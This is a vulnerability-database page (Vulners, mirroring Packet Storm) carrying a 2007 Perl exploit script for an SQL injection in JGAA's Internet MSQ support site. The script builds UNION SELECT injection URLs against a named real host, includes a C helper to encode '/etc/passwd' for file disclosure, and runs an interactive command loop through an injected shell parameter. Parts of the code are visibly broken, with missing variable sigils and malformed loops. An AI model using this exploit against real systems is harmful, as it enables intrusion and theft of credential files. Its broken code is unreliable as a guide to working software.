Lucene search

jgaa-sql.txt

🗓️ 25 Jul 2007 00:00:00Reported by fl0 fl0wType

packetstorm🔗 packetstormsecurity.com👁 21 Views

Perl script for exploiting SQL injection vulnerability on JGAA's Internet MSQ

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`#!/usr/bin/perl  
#You can get admin hash,or acces the pass file from the *NIx   
#with the generated strings with the generator.c program  
#you have to put in sql specific comands,my example is for   
#tables and *NIX pass  
#exploit tested on winxp sp2   
# #include<stdio.h>  
  
# #include<stdlib.h>  
  
# #include<string.h>  
  
# int main()  
  
# { char st[1024];  
# int le;  
# printf("Input : ");  
# gets(st);  
# for(le=0;le<strlen(st);le++)  
  
# { printf("%d,",st[le]);  
# }   
# system("pause");  
  
# return 0;  
# }  
  
#101,116,99,47,112,97,115,115,119,100 = /etc/passwd  
  
#If we would do this :  
#http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/*  
#we create 8 tables ,to see the result type :  
#-1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/*  
  
print "......Start.......\n";  
print ".................\n";  
print ". fl0 fl0w .\n";  
print ". found by fl0w fl0w\n";  
print ". c0ded by fl0 fl0w\n";  
print ".......Email me at flo[underscore]fl0w[underscore]supremacy[dot]com\n\n";  
print ".................\n\n";  
  
use LWP::UserAgent;  
  
$site=@ARGV[0];  
  
$shells=@ARGV[1];  
$shellcmd=@ARGV[2];  
  
if($site!~/http:\/\// || $site!~/http:\/\// || !$shells)   
  
{ routine()  
}  
  
header();  
  
while() { print"[shell] \$";   
while(<STDIN>)  
{ $cmd=$_;  
  
chomp($cmd);  
$sploit=LWP::UserAgent->new() or die;  
$requesting=HTTP::Request->new(GET=>$site.'/index.php?cmd=DownloadVersion&ID=-1/**/UNION/**/SELECT/**/0/*'.$shells.'?&'.$shellcmd.'='.$cmd) or die"\n\n NOT CONNECTED\n";  
$re=$sploit->request(requesting);   
  
$i=$re->content;  
$i=~tr/[\n]/[ê]/;  
if(!$cmd) { print "Enter a command\n\n";  
$i="";   
}   
  
  
elsif(i=~/failed to open:HTTP request failed!/ || $i=~/:cannot execute the command in <b>/ )  
  
{ print "\nCould NOT connect to cmd from host \n";  
exit;  
}   
elsif($i=~/^<br.\/>.<b>WARNING/) {   
print "\nInvalid command\n\n";  
  
};  
if($i=~/(.+)<br.\/>.<b>WARNING.(.+)<br.\/>.<b>WARNING/)  
{ $last=$1;  
$last=~tr/[&234;]/[\n]/;  
print "\n$last\n";  
last;  
}  
  
  
else {  
print "[shell] \$";  
}   
}   
}   
last;  
  
sub header()  
{ print q {   
  
================================================================================================================================================================  
MSQL injection -file disclosure in Jgaa's Internet   
PoC:http://support.jgaa.com   
Demo:http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=-1/**/UNION/**/SELECT/**/0/*  
================================================================================================================================================================  
}  
  
}  
sub routine()  
{ header();  
print q {   
======================================================================================================   
USAGE: perl exploit.pl <http://site.com>  
EXAMPLE: perl [localhost\][path] exploit.pl [target]  
======================================================================================================   
};  
  
exit();  
  
}  
  
  
  
  
  
---------------------------------  
Yahoo! oneSearch: Finally, mobile search that gives answers, not web links. `

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

25 Jul 2007 00:00Current

7.4High risk

Vulners AI Score7.4